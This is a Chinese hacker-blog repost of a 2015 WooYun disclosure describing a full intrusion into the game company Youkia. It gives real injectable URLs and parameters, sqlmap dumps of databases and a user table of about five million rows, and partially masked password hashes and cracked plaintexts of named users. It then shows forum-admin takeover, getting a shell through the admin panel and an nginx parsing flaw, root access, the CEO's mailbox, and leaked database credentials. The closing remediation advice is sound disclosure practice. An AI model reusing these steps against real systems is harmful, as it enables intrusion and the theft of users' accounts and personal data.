记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

天上友嘉旗下所有游戏可被黑(一次详细的网游测试案例,官网可修改,用户数据库任意操作,CEO邮箱可进,各种泄露)

2015-08-11 09:30

首先是一个sql注入:http://www.youkia.com/index.php/news/getcommentlist

POST:post_id=1

1.png



code 区域
available databases [30]:

[*] biggestboss

[*] efdata

[*] etian

[*] information_schema

[*] joyplan

[*] mydreami

[*] mysql

[*] nagdb

[*] ndbinfo

[*] pvz_v2

[*] pvz_web

[*] qiuqiu

[*] qx_youkia_com

[*] slowlog

[*] test

[*] tj_forum

[*] tj_web

[*] tmp

[*] tt

[*] vuln

[*] waw_forum

[*] yk_arena

[*] yk_cards

[*] yk_clan

[*] yk_egg

[*] yk_group

[*] yk_lot

[*] yk_pet

[*] yk_special

[*] ykdata



code 区域
[21:03:55] [INFO] fetching columns for table 'youkia_user' in database 'ykdata'

[21:03:55] [INFO] the SQL query used returns 20 entries

[21:03:55] [INFO] resumed: id

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: username

[21:03:55] [INFO] resumed: char(20)

[21:03:55] [INFO] resumed: truename

[21:03:55] [INFO] resumed: char(20)

[21:03:55] [INFO] resumed: email

[21:03:55] [INFO] resumed: char(40)

[21:03:55] [INFO] resumed: password

[21:03:55] [INFO] resumed: char(32)

[21:03:55] [INFO] resumed: sex

[21:03:55] [INFO] resumed: enum('0','1','2')

[21:03:55] [INFO] resumed: expr

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: lastlogin

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: logintimes

[21:03:55] [INFO] resumed: int(10)

[21:03:55] [INFO] resumed: created

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: mtime

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: status

[21:03:55] [INFO] resumed: tinyint(1)

[21:03:55] [INFO] resumed: networkid

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: inviteuser

[21:03:55] [INFO] resumed: int(11)

[21:03:55] [INFO] resumed: jb

[21:03:55] [INFO] resumed: tinyint(3)

[21:03:55] [INFO] resumed: member

[21:03:55] [INFO] resumed: char(1)

[21:03:55] [INFO] resumed: nickname

[21:03:55] [INFO] resumed: char(20)

[21:03:55] [INFO] resumed: photo

[21:03:55] [INFO] resumed: tinyint(1)

[21:03:55] [INFO] resumed: is_old

[21:03:55] [INFO] resumed: tinyint(1)

[21:03:55] [INFO] resumed: check_email

[21:03:55] [INFO] resumed: tinyint(3)

[21:03:55] [INFO] fetching entries for table 'youkia_user' in database 'ykdata'

[21:03:55] [INFO] the SQL query used returns 4991662 entries



所有的用户数据都在这个表里,知道昵称/email/id就可以select出密码,比如随便搞一个:

5.png



code 区域
select * from ykdata.youkia_user where nickname='拜托小姐' [1]:

[*] 1, 1289*****, 1009****@qq.com, 59**, 395***, 3949***, 0, *, 130******, 1*, , 13***, 0, 拜托小姐, 26876f9408b6c0e9***,1, 1, 1, **, youkia395*



6.png



明文:7NM***,用email和密码登陆

7.png



8.png



但是,到这里感觉没法继续深入了,忽然发现官方论坛存在nginx解析漏洞

http://f.youkia.com/forum/static/image/banner/2015-06-10.jpg/.php

2.png



但是上传图片发现目录有限制

3.png



死胡同,继续搞,发现另一个站的sql注入

http://www.youkia.net/index/checkname/name/*

code 区域
available databases [25]:

[*] anhei_bbs

[*] cps_youkia_web

[*] haogame

[*] information_schema

[*] jiradb

[*] jiradb5

[*] joyplan

[*] mydreami

[*] mydreami_phpwind

[*] mydreami_ucenter

[*] mysql

[*] nagdb

[*] pvz_events

[*] SeaSkyBBS

[*] SeaSkyJira

[*] shallwe

[*] test

[*] ultrax

[*] worklog

[*] yk_digg

[*] yk_forum

[*] ykBBS

[*] youkia_net

[*] youkia_net_temp

[*] zhinangwiki



ultrax,论坛的数据库

dump出管理员uid

code 区域
Table: pre_common_admincp_member

[1 entry]

+---------+-----------+------------+

| uid | cpgroupid | customperm |

+---------+-----------+------------+

| 6645241 | 0 | <blank> |

+---------+-----------+------------+



4.png



拿到邮箱,回刚才的库里尝试用email注入出密码

code 区域
select * from ykdata.youkia_user where email='[email protected] ' [1]:

[*] 0, *, [email protected] , *, *, 0, 0, 3, *, 3, ,*, 0, lmjiming1, 035868***, 1, 1, 1, **,youki

a664**



果然有,拿去解密

9.png



明文:lm51****,登陆论坛

10.png



11.png



dz后台直接getshell

12.png



root权限,可反弹shell

3.png



4.png



cps系统,同服同数据库,可直接进入

14.png



15.png



这时候回过头搞子域名,发现mail.youkia.com

16.png



看样子这两个域名都是企业邮箱,用

select * from table where email like '%@youkia.com'

select * from table where email like '%@saesky.cn'

分别查询

code 区域
select * from ykdata.youkia_user where email like '%@seasky.cn' [5]:

[*] 1, *, 189*@seasky.cn, 938**, *, , *, 4*, 1351*, 276*, *, 123*, 0, **, e10adc3949ba5**, , 1, 1, 何*, shall*



解密后登陆

17.png



CEO邮箱

18.png



19.png



可修改游戏公告

20.png



官网后台

21.png



发现官网居然也有nginx解析漏洞

22.png



上传图片马,getshell

23.png



所有游戏子域名一目了然,官网可改

24.png



25.png

漏洞证明:

code 区域
'dbgm' => array(

'class' => 'system.db.CDbConnection',

'connectionString' => 'mysql:host=192.168.*;dbname=bi_*',

'emulatePrepare' => true,

'username' => 'webUs*',

'password' => 'haNshu*',

'charset' => 'utf8',





code 区域
sql-shell> select count(*) from ykdata.youkia_user;

[21:59:24] [INFO] fetching SQL SELECT statement query output: 'select count(*) from ykdata.youkia_user'

[21:59:25] [INFO] heuristics detected web page charset 'ascii'

[21:59:25] [INFO] retrieved: 4995809

select count(*) from ykdata.youkia_user;: '4995809'



修复方案:

1. 你们应该招个靠谱的安全工程师。

2. 对所有系统进行安全排查,修改所有数据库/后台/系统密码,确保没被恶意黑客利用。

3. 过滤sql,升级nginx,对数据库、web server降权。root权限闹哪样?

4. 作为3年前的玩家,提个安全以外的建议:植物大战僵尸ol能否有点剧情?光是打僵尸打植物打竞技场多无聊……


知识来源: www.wooyun.org/bugs/wooyun-2015-0123018

阅读:434170 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“天上友嘉旗下所有游戏可被黑(一次详细的网游测试案例,官网可修改,用户数据库任意操作,CEO邮箱可进,各种泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云